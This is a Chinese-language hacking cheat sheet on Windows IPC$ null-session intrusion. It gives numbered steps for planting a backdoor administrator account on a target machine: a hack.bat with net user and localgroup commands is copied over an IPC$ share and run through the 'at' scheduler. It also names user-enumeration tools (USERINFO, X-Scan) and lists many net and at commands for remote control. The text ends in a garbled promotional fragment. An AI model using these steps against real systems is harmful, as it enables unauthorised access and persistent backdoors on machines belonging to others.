nbtstat -A *.*.*.*
得到远程主机的NetBIOS用户名列表

copy server1.exe
即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内

建立IPC$连接
例子： net use "" /user:"administrator"
查看帐号— net user
      建立帐号— net user name passwd /add
      删除帐号— net user name passwd /del
         
断开连接：
键入“net use * /del”命令断开所有的IPC$连接。键入“net use \\目标IP\IPC$ /del”可以删除指定目标IP的IPC$连接。

实例：建立后门帐号，步骤如下：
    (1)编写BAT文件：
       打开记事本，输入“net user emile 123456 /add”和“net localgroup administrators emile /add”，然后把文件另存为“hack.bat”,保存在cmd当前默认目录下。
    (2)与目标主机建立IPC$连接，以192.168.1.60为例：
       打开cmd窗口，分别执行命令：
       net use "" /user:"administrator"
       net use z:
    (3)拷贝bat文件到目标主机：
       在cmd窗口输入copy hack.bat ，把文件拷贝到目标位置；也可以打开映射驱动器用图形界面直接进行拷贝操作。
    (4)通过计划任务使远程主机执行hack.bat文件：
       首先键入“net time ”查看远程主机的系统时间，再键入“at TIME COMMAND”命令在远程主机上建立计划任务。
       参数说明：IP—目标主机IP；TIME—设定计划任务执行的时间；COMMAND—计划任务要执行的命令，如此处为C:\hack.bat。
       计划任务添加完毕后，使用命令“net use * /del”断开IPC$连接。
    (5)验证帐号是否成功建立：
       等待一段时间，当估计远程主机已经执行hack.bat文件后，通过用新帐号建立IPC$连接来验证是否成功建立“emile”帐号，连接成功则说明帐号成功建立。
      
        (3)获取目标主机上的用户信息：USERINFO.exe和X-Scan是常用的两款获取用户信息的工具。
    a.USERINFO是利用IPC$漏洞来查看目标主机用户信息的工具，通过USERINFO来查看目标主机用户信息的时候，并不需要事先建立IPC$空连接。
      命令：USERINFO USER 用来查看目标IP上USER用户信息，然后根据反馈的结果进行具体分析。
    b.X-Scan扫描器也是利用目标主机存在的IPC$空连接漏洞，获取用户信息，用法略
   
    net user 查看用户列表
    net user 用户名 密码 /add 添加用户
    net user 用户名 密码 更改用户密码
net localgroup administrators 用户名 /add 添加用户到管理组
net user 用户名 /delete 删除用户
net user 用户名 /delete 删除用户
net user 用户名 查看用户的基本情况
net user 用户名 /active:no 禁用该用户
net user 用户名 /active:yes 启用该用户

net share 查看计算机IPC$共享资源
net share 共享名 查看该共享的情况
net share 共享名=路径 设置共享。例如 net share c$=c:
net share 共享名 /delete 删除IPC$共享

net use 查看IPC$连接情况
net use "密码" /user:"用户名" ipc$连接

net time 查看远程计算机上的时间

copy 路径:\文件名 共享名 复制文件到已经ipc$连接的计算机上

net view ip 查看计算机上的共享资源

ftp 服务器地址 进入FTP服务器

at 查看自己计算机上的计划作业
at 查看远程计算机上的计划作业
at 时间 命令(注意加盘符) 在远程计算机上加一个作业
at 计划作业ID /delete 删除远程计算机上的一个计划作业
at all /delete 删除远程计算机上的全部计划作业
安全有威胁登陆或直接专家将为您提供帮助